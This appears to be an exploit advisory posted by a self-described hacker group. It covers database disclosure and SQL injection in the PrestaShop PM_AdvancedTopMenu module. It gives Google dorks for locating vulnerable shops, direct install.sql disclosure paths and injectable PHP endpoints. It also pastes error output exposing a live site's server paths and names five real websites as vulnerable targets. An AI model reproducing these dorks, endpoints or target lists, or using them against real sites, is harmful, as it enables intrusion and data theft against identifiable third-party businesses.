################################################################################################# # Exploit Title : PrestaShop PM_AdvancedTopMenu 1.4.6.2 Database Disclosure and SQL Injection # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 24/12/2018 # Vendor Homepage : prestashop.com # Software Download Link : presta-module.com/en/3-prestashop-addons/7-appearance/6-advanced-top-menu.html + prestashop.com/forums/topic/89175-module-pm-advancedtopmenu/ + addons.prestashop.com/en/menu/2072-advanced-top-menu-responsive.html # Software Price : 50$ # Tested On : Windows and Linux # Category : WebApps # Version Information : 1.4.10.0 - 1.4.7.0 - 1.4.6.2 # Exploit Risk : Medium # Google Dorks : inurl:''/modules/pm_advancedtopmenu/'' intext:''Hexagone High-Tech se fournit chez'' intext:''crA(c)ation: webncie // A(c) Eight-Racing.com 2013-2014 tous droits rA(c)servA(c)s'' # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] CWE-89 - [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Database Disclosure Exploit : /modules/pm_advancedtopmenu/install.sql # SQL Injection Exploit : /modules/pm_advancedtopmenu/pm_advancedtopmenu.php?id=[SQL Injection] /modules/pm_advancedtopmenu/AdvancedTopMenuClass.php?id=[SQL Injection] /modules/pm_advancedtopmenu/AdvancedTopMenuColumnClass.php?id=[SQL Injection] /modules/pm_advancedtopmenu/AdvancedTopMenuColumnWrapClass.php?id=[SQL Injection] ################################################################################################# # Example SQL Database Error => Warning: include_once(_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuClass.php): failed to open stream: No such file or directory in /home/hexago7/public_html/hexagone.mg/modules/ pm_advancedtopmenu/pm_advancedtopmenu.php on line 19 Warning: include_once(): Failed opening '_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuClass.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/hexago7/public_html/hexagone.mg/modules /pm_advancedtopmenu/pm_advancedtopmenu.php on line 19 Warning: include_once(_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuColumnWrapClass.php): failed to open stream: No such file or directory in /home/hexago7/public_html/hexagone.mg/modules /pm_advancedtopmenu/pm_advancedtopmenu.php on line 20 Warning: include_once(): Failed opening '_PS_ROOT_DIR_/modules/pm_advancedtopmenu /AdvancedTopMenuColumnWrapClass.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/hexago7/public_html/ hexagone.mg/modules/pm_advancedtopmenu/pm_advancedtopmenu.php on line 20 Warning: include_once(_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuColumnClass.php): failed to open stream: No such file or directory in /home/hexago7/public_html/hexagone.mg/modules /pm_advancedtopmenu/pm_advancedtopmenu.php on line 21 Warning: include_once(): Failed opening '_PS_ROOT_DIR_/modules/pm_advancedtopmenu /AdvancedTopMenuColumnClass.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/hexago7/public_html/ hexagone.mg/modules/pm_advancedtopmenu/pm_advancedtopmenu.php on line 21 Warning: include_once(_PS_ROOT_DIR_/modules/pm_advancedtopmenu/AdvancedTopMenuElementsClass.php): failed to open stream: No such file or directory in /home/hexago7/public_html/hexagone.mg/ modules/pm_advancedtopmenu/pm_advancedtopmenu.php on line 22 Warning: include_once(): Failed opening '_PS_ROOT_DIR_/modules/pm_advancedtopmenu/ AdvancedTopMenuElementsClass.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/hexago7/public_html/ hexagone.mg/modules/pm_advancedtopmenu/pm_advancedtopmenu.php on line 22 Fatal error: Class 'Module' not found in /home/hexago7/public_html/ hexagone.mg/modules /pm_advancedtopmenu/pm_advancedtopmenu.php on line 23 Fatal error: Class 'ObjectModel' not found in /home/hexago7/public_html/ hexagone.mg /modules/pm_advancedtopmenu/AdvancedTopMenuClass.php on line 13 Fatal error: Class 'ObjectModel' not found in /home/hexago7/public_html/ hexagone.mg/modules /pm_advancedtopmenu/AdvancedTopMenuColumnClass.php on line 13 Fatal error: Class 'ObjectModel' not found in /home/hexago7/public_html/ hexagone.mg/modules /pm_advancedtopmenu/AdvancedTopMenuColumnWrapClass.php on line 13 ################################################################################################# # Example Vulnerable Sites => [+] hexagone.mg/modules/pm_advancedtopmenu/install.sql [+] griffin.ch/modules/pm_advancedtopmenu/install.sql [+] eight-racing.com/modules/pm_advancedtopmenu/install.sql [+] domaine-vial.fr/modules/pm_advancedtopmenu/install.sql [+] tecnicamurciana.es/modules/pm_advancedtopmenu/install.sql ################################################################################################# # Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################